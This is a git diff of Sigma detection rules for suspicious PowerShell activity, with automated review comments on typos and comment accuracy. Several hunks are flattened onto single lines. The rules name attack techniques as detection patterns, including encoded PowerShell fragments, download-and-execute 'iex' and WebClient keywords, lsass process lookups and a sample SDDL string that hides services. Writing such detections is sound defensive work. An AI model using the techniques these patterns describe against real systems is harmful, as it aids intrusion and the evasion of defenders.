- NewProcessName|endswith:
+ NewProcessName|endswith:
- \powershell.exe
- \pwsh.exe
filter_encoding:
- CommandLine|contains: ' -Encoding '
+ CommandLine|contains: ' -Encoding '
filter_azure:
ParentProcessName|contains:
- C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml
index 4785f2e4e..c3b7f8630 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml
@@ -1,8 +1,7 @@
title: Suspicious PowerShell Encoded Command Patterns
id: b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c
status: test
-description: Detects PowerShell command line patterns in combincation with encoded
- commands that often appear in malware infection chains
+description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
references:
- https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/
author: Florian Roth (Nextron Systems)
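Review bot: The re-flowed description line of proc_creation_win_powershell_encoded_cmd_patterns.yml carries the typo `combincation` over from the old text; since the line is being rewritten anyway, this is the moment to correct it: `description: Detects PowerShell command line patterns in combination with encoded commands that often appear in malware infection chains`. The rule's `detection` block is in the following hunk.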
@@ -19,20 +18,20 @@ detection:
EventID: 4688
Channel: Security
selection_img:
- - NewProcessName|endswith:
- - \powershell.exe
- - \pwsh.exe
- - OriginalFileName:
- - PowerShell.Exe
- - pwsh.dll
+ - NewProcessName|endswith:
+ - \powershell.exe
+ - \pwsh.exe
+ - OriginalFileName:
+ - PowerShell.Exe
+ - pwsh.dll
selection_flags:
- CommandLine|contains:
+ CommandLine|contains:
- ' -e '
- ' -en '
- ' -enc '
- ' -enco'
selection_encoded:
- CommandLine|contains:
+ CommandLine|contains:
- ' JAB'
- ' SUVYI'
- ' SQBFAFgA'
@@ -46,7 +45,6 @@ detection:
- \gc_worker.exe
condition: process_creation and (all of selection_* and not 1 of filter_*)
falsepositives:
- - Other tools that work with encoded scripts in the command line instead of script
- files
+ - Other tools that work with encoded scripts in the command line instead of script files
level: high
ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_obfusc.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_obfusc.yml
index dbac48dbc..7b7924e2b 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_obfusc.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_encoded_obfusc.yml
@@ -1,8 +1,7 @@
title: Suspicious Obfuscated PowerShell Code
id: 8d01b53f-456f-48ee-90f6-bc28e67d4e35
status: test
-description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell
- code often used in command lines
+description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines
references:
- https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/
author: Florian Roth (Nextron Systems)
@@ -18,13 +17,18 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ CommandLine|contains:
+ # -bxor 0x
- IAAtAGIAeABvAHIAIAAwAHgA
- AALQBiAHgAbwByACAAMAB4A
- gAC0AYgB4AG8AcgAgADAAeA
+ # .Invoke() |
- AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg
- AuAEkAbgB2AG8AawBlACgAKQAgAHwAI
- ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC
+ # {1}{0}" -f
+ # {0}{3}" -f
+ # {2}{0}" -f
- AHsAMQB9AHsAMAB9ACIAIAAtAGYAI
- B7ADEAfQB7ADAAfQAiACAALQBmAC
- AewAxAH0AewAwAH0AIgAgAC0AZgAg
@@ -34,6 +38,9 @@ detection:
- AHsAMgB9AHsAMAB9ACIAIAAtAGYAI
- B7ADIAfQB7ADAAfQAiACAALQBmAC
- AewAyAH0AewAwAH0AIgAgAC0AZgAg
+ # {1}{0}' -f
+ # {0}{3}' -f
+ # {2}{0}' -f
- AHsAMQB9AHsAMAB9ACcAIAAtAGYAI
- B7ADEAfQB7ADAAfQAnACAALQBmAC
- AewAxAH0AewAwAH0AJwAgAC0AZgAg
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_encoding_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_encoding_patterns.yml
index 2b274e6a8..f4c6e9da1 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_encoding_patterns.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_encoding_patterns.yml
@@ -1,11 +1,10 @@
title: Potential Encoded PowerShell Patterns In CommandLine
id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f
related:
- - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6
- type: similar
+ - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6
+ type: similar
status: test
-description: Detects specific combinations of encoding methods in PowerShell via the
- commandline
+description: Detects specific combinations of encoding methods in PowerShell via the commandline
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65
author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
@@ -24,14 +23,14 @@ detection:
 EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_to_1: - CommandLine|contains: + CommandLine|contains: - ToInt - ToDecimal - ToByte
@@ -39,20 +38,19 @@ detection:
 - ToSingle - ToSByte selection_to_2: - CommandLine|contains: + CommandLine|contains: - ToChar - ToString - String selection_gen_1: - CommandLine|contains|all: + CommandLine|contains|all: - char - join selection_gen_2: - CommandLine|contains|all: + CommandLine|contains|all: - split - join - condition: process_creation and (selection_img and (all of selection_to_* or 1 - of selection_gen_*)) + condition: process_creation and (selection_img and (all of selection_to_* or 1 of selection_gen_*)) falsepositives: - Unknown level: low
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_exec_data_file.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_exec_data_file.yml
index e14972fb1..b1466940e 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_exec_data_file.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_exec_data_file.yml
@@ -17,18 +17,18 @@ detection:
 EventID: 4688 Channel: Security selection_exec: - CommandLine|contains: + CommandLine|contains: - 'iex ' - 'Invoke-Expression ' - 'Invoke-Command ' - 'icm ' selection_read: - CommandLine|contains: + CommandLine|contains: - 'cat ' - 'get-content ' - 'type ' selection_raw: - CommandLine|contains: ' -raw' + CommandLine|contains: ' -raw' condition: process_creation and (all of selection_*) falsepositives: - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_export_certificate.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_export_certificate.yml
index 036f67a13..babefa6be 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_export_certificate.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_export_certificate.yml
@@ -1,12 +1,10 @@
 title: Certificate Exported Via PowerShell id: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb related: - - id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c - type: similar + - id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c + type: similar status: experimental -description: Detects calls to cmdlets that are used to export certificates from the - local certificate store. Threat actors were seen abusing this to steal private - keys from compromised machines. +description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a - https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate
@@ -26,12 +24,11 @@ detection:
 EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - 'Export-PfxCertificate ' - 'Export-Certificate ' condition: process_creation and selection falsepositives: - - Legitimate certificate exports by administrators. Additional filters might be - required. + - Legitimate certificate exports by administrators. Additional filters might be required. level: medium ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string.yml
index 4c9806972..5472dd440 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string.yml
@@ -1,8 +1,7 @@
 title: Base64 Encoded PowerShell Command Detected id: e32d4572-9826-4738-b651-95fa63747e8a status: test -description: Detects usage of the "FromBase64String" function in the commandline which - is used to decode a base64 encoded string +description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string references: - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 author: Florian Roth (Nextron Systems)
@@ -21,7 +20,7 @@ detection:
 EventID: 4688 Channel: Security selection: - CommandLine|contains: ::FromBase64String( + CommandLine|contains: ::FromBase64String( condition: process_creation and selection falsepositives: - Administrative script libraries
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string_archive.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string_archive.yml
index 8d7ab4138..5f388f1ae 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string_archive.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string_archive.yml
@@ -1,11 +1,10 @@
 title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f related: - - id: df69cb1d-b891-4cd9-90c7-d617d90100ce - type: similar + - id: df69cb1d-b891-4cd9-90c7-d617d90100ce + type: similar status: test -description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This - technique is often used as a method to load malicious content into memory afterward. +description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward. references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43 author: frack113
@@ -21,7 +20,7 @@ detection:
 EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - FromBase64String - MemoryStream - H4sI
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_get_clipboard.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_get_clipboard.yml
index af485cb86..3ca89ffdd 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_get_clipboard.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_get_clipboard.yml
@@ -1,8 +1,8 @@
 title: PowerShell Get-Clipboard Cmdlet Via CLI id: b9aeac14-2ffd-4ad3-b967-1354a4e628c3 related: - - id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 - type: derived + - id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 + type: derived status: test description: Detects usage of the 'Get-Clipboard' cmdlet via CLI references:
@@ -22,7 +22,7 @@ detection:
 EventID: 4688 Channel: Security selection: - CommandLine|contains: Get-Clipboard + CommandLine|contains: Get-Clipboard condition: process_creation and selection falsepositives: - Unknown
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml
index cbedc66ea..2c0bcd172 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml
@@ -1,11 +1,10 @@
 title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet id: c8a180d6-47a3-4345-a609-53f9c3d834fc related: - - id: cef24b90-dddc-4ae1-a09a-8764872f69fc - type: similar + - id: cef24b90-dddc-4ae1-a09a-8764872f69fc + type: similar status: test -description: Detects suspicious reconnaissance command line activity on Windows systems - using the PowerShell Get-LocalGroupMember Cmdlet +description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ author: Nasreddine Bencherchali (Nextron Systems)
@@ -17,21 +16,23 @@ logsource:
 category: process_creation product: windows detection: + # Covers group and localgroup flags process_creation: EventID: 4688 Channel: Security selection_cmdlet: - CommandLine|contains: 'Get-LocalGroupMember ' + CommandLine|contains: 'Get-LocalGroupMember ' selection_group: - CommandLine|contains: + CommandLine|contains: + # Add more groups for other languages - domain admins - - ' administrator' - - ' administrateur' + - ' administrator' # Typo without an 'S' so we catch both + - ' administrateur' # Typo without an 'S' so we catch both - enterprise admins - Exchange Trusted Subsystem - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto + - Utilisateurs du Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" condition: process_creation and (all of selection_*) fields: - CommandLine
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_getprocess_lsass.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_getprocess_lsass.yml
index 310f040f3..55f6d572e 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_getprocess_lsass.yml
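Review bot: The comment `# Typo without an 'S' so we catch both` added to the ` administrator` and ` administrateur` entries in `selection_group` describes an intentional prefix match as a typo, which the next maintainer is likely to "fix"; `# Intentionally no trailing 's' so both singular and plural group names match` states the intent. The same hunk replaces the escaped `"Utilisateurs du Bureau \xE0 distance"` with a literal `à`, so that match string now depends on the file being read as UTF-8 — presumably the rule loader does that, but the escaped form was encoding-independent and the change deserves a mention. Both hunks of this file are complete within this view.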
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_getprocess_lsass.yml
@@ -1,8 +1,7 @@
 title: PowerShell Get-Process LSASS id: b2815d0d-7481-4bf0-9b6c-a4c48a94b349 status: test -description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which - is in almost all cases a sign of malicious activity +description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity references: - https://twitter.com/PythonResponder/status/1385064506049630211 author: Florian Roth (Nextron Systems)
@@ -19,7 +18,8 @@ detection:
 EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # You can add more permutation as you see fit - Get-Process lsas - ps lsas - gps lsas
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml
index 3a596f738..b75167798 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml
@@ -1,8 +1,7 @@
 title: Malicious Base64 Encoded PowerShell Keywords in Command Lines id: f26c6093-6f14-4b12-800f-0fcb46f5ffd0 status: test -description: Detects base64 encoded strings used in hidden malicious PowerShell command - lines +description: Detects base64 encoded strings used in hidden malicious PowerShell command lines references: - http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/ author: John Lambert (rule)
@@ -19,16 +18,16 @@ detection:
 EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_hidden: - CommandLine|contains: ' hidden ' + CommandLine|contains: ' hidden ' selection_encoded: - CommandLine|contains: + CommandLine|contains: - AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA - aXRzYWRtaW4gL3RyYW5zZmVy - IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml
index bf96d4060..3471d3c54 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml
@@ -1,14 +1,12 @@
 title: Abuse of Service Permissions to Hide Services Via Set-Service id: 514e4c3a-c77d-4cde-a00f-046425e2301e related: - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: derived - - id: 953945c5-22fe-4a92-9f8a-a9edc1e522da - type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 + type: derived + - id: 953945c5-22fe-4a92-9f8a-a9edc1e522da + type: similar status: test -description: Detects usage of the "Set-Service" powershell cmdlet to configure a new - SecurityDescriptor that allows a service to be hidden from other utilities such - as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) +description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) references: - https://twitter.com/Alh4zr3d/status/1580925761996828672 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
@@ -27,14 +25,15 @@ detection:
 EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \pwsh.exe - - OriginalFileName: pwsh.dll + - NewProcessName|endswith: \pwsh.exe + - OriginalFileName: pwsh.dll selection_sddl: - CommandLine|contains|all: + # Example would be: "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" + CommandLine|contains|all: - 'Set-Service ' - DCLCWPDTSD selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - '-SecurityDescriptorSddl ' - '-sd ' condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_iex_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_iex_patterns.yml
index 80ab07d4d..cb92a921c 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_iex_patterns.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_iex_patterns.yml
@@ -18,7 +18,7 @@ detection:
 EventID: 4688 Channel: Security selection_combined_1: - CommandLine|contains: + CommandLine|contains: - ' | iex;' - ' | iex ' - ' | iex}'
@@ -26,15 +26,15 @@ detection:
 - ' | IEX -Error' - ' | IEX (new' - ');IEX ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe selection_combined_2: - CommandLine|contains: + CommandLine|contains: - ::FromBase64String - '.GetString([System.Convert]::' selection_standalone: - CommandLine|contains: + CommandLine|contains: - )|iex;$ - );iex($ - );iex $
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml
index e32b27006..464763622 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml
@@ -1,8 +1,7 @@
 title: Root Certificate Installed From Susp Locations id: 5f6a601c-2ecb-498b-9c33-660362323afa status: test -description: Adversaries may install a root certificate on a compromised system to - avoid warnings when connecting to adversary controlled web servers. +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ - https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps
@@ -20,11 +19,11 @@ detection:
 EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - Import-Certificate - ' -FilePath ' - Cert:\LocalMachine\Root - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp\ - :\Windows\TEMP\ - \Desktop\
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml
index eba85fc99..bf7912eec 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml
@@ -1,8 +1,8 @@
 title: Import PowerShell Modules From Suspicious Directories - ProcCreation id: c31364f7-8be6-4b77-8483-dd2b5a7b69a3 related: - - id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab - type: similar + - id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab + type: similar status: test description: Detects powershell scripts that import modules from suspicious directories references:
@@ -20,7 +20,7 @@ detection:
 EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - Import-Module "$Env:Temp\ - Import-Module '$Env:Temp\ - Import-Module $Env:Temp\
@@ -28,6 +28,7 @@ detection:
 - Import-Module '$Env:Appdata\ - Import-Module $Env:Appdata\ - Import-Module C:\Users\Public\ + # Import-Module alias is "ipmo" - ipmo "$Env:Temp\ - ipmo '$Env:Temp\ - ipmo $Env:Temp\
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml
index 93fcc1167..0b7b6ec4b 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml
@@ -1,11 +1,10 @@
 title: Unsigned AppX Installation Attempt Using Add-AppxPackage id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a related: - - id: 975b2262-9a49-439d-92a6-0709cccdf0b2 - type: similar + - id: 975b2262-9a49-439d-92a6-0709cccdf0b2 + type: similar status: test -description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" - to install unsigned AppX packages +description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages references: - https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package - https://twitter.com/WindowsDocs/status/1620078135080325122
@@ -22,18 +21,18 @@ detection:
 EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Add-AppPackage ' - 'Add-AppxPackage ' selection_flag: - CommandLine|contains: ' -AllowUnsigned' + CommandLine|contains: ' -AllowUnsigned' condition: process_creation and (all of selection_*) falsepositives: - Installation of unsigned packages for testing purposes
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_invocation_specific.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_invocation_specific.yml
index fc5f5478d..b66a20753 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_invocation_specific.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_invocation_specific.yml
@@ -1,12 +1,12 @@
 title: Suspicious PowerShell Invocations - Specific - ProcessCreation id: 536e2947-3729-478c-9903-745aaffe60d2 related: - - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c - type: derived - - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 - type: similar - - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 - type: similar + - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c + type: derived + - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 + type: similar + - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 + type: similar status: test description: Detects suspicious PowerShell invocation command parameters author: Nasreddine Bencherchali (Nextron Systems)
@@ -21,14 +21,14 @@ detection:
 EventID: 4688 Channel: Security selection_convert_b64: - CommandLine|contains|all: + CommandLine|contains|all: - -nop - ' -w ' - hidden - ' -c ' - '[Convert]::FromBase64String' selection_iex: - CommandLine|contains|all: + CommandLine|contains|all: - ' -w ' - hidden - -noni
@@ -37,20 +37,20 @@ detection:
 - iex - New-Object selection_enc: - CommandLine|contains|all: + CommandLine|contains|all: - ' -w ' - hidden - -ep - bypass - -Enc selection_reg: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - reg - add - \software\ selection_webclient: - CommandLine|contains|all: + CommandLine|contains|all: - bypass - -noprofile - -windowstyle
@@ -59,13 +59,13 @@ detection:
 - system.net.webclient - .download selection_iex_webclient: - CommandLine|contains|all: + CommandLine|contains|all: - iex - New-Object - Net.WebClient - .Download filter_chocolatey: - CommandLine|contains: + CommandLine|contains: - (New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1 - Write-ChocolateyWarning condition: process_creation and (1 of selection_* and not 1 of filter_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml
index e897d4d3a..583c2e9c0 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml
@@ -1,8 +1,7 @@
 title: Suspicious Invoke-WebRequest Execution With DirectIP id: 1edff897-9146-48d2-9066-52e8d8f80a2f status: experimental -description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct - IP access +description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access references: - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software author: Nasreddine Bencherchali (Nextron Systems)
@@ -18,20 +17,22 @@ detection:
 EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_commands: - CommandLine|contains: + CommandLine|contains: + # These are all aliases of Invoke-WebRequest - 'curl ' - Invoke-WebRequest - 'iwr ' - 'wget ' selection_ip: - CommandLine|contains: + # In case of FP with local IPs add additional filters + CommandLine|contains: - ://1 - ://2 - ://3
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml
index f48a91ba0..2e98d28bf 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml
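Review bot: The comment `# These are all aliases of Invoke-WebRequest` added to `selection_commands` is only true for Windows PowerShell: the `curl` and `wget` aliases were removed in PowerShell 6 and later, and `selection_img` also matches `\pwsh.exe`, where `curl ` or `wget ` on the command line most likely runs the native binaries rather than the cmdlet. The entries are still useful as download indicators, so only the comment needs correcting, for example `# iwr is an alias of Invoke-WebRequest; curl/wget are aliases in Windows PowerShell 5.1 only (removed in PowerShell 6+)`. The same comment is added in the following proc_creation_win_powershell_invoke_webrequest_download.yml hunk and should be corrected there too. Both hunks of this file are complete within this view.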
@@ -1,11 +1,10 @@
 title: Suspicious Invoke-WebRequest Execution id: 5e3cc4d8-3e68-43db-8656-eaaeefdec9cc related: - - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 - type: derived + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 + type: derived status: experimental -description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output - is located in a suspicious location +description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ author: Nasreddine Bencherchali (Nextron Systems)
@@ -22,24 +21,25 @@ detection:
 EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_commands: - CommandLine|contains: + CommandLine|contains: + # These are all aliases of Invoke-WebRequest - 'curl ' - Invoke-WebRequest - 'iwr ' - 'wget ' selection_flags: - CommandLine|contains: + CommandLine|contains: - ' -ur' - ' -o' selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - \AppData\ - \Desktop\ - \Temp\
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_mailboxexport_share.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_mailboxexport_share.yml
index e7e133711..f33f47c05 100644
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_mailboxexport_share.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_mailboxexport_share.yml
@@ -1,8 +1,7 @@
 title: Suspicious PowerShell Mailbox Export to Share id: 889719ef-dd62-43df-86c3-768fb08dc7c0 status: test -description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports - a mailbox to a remote or local share, as used in ProxyShell exploitations +description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations references: - https://youtu.be/5mqid-7zp8k?t=2481 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
@@ -21,7 +20,7 @@ detection:
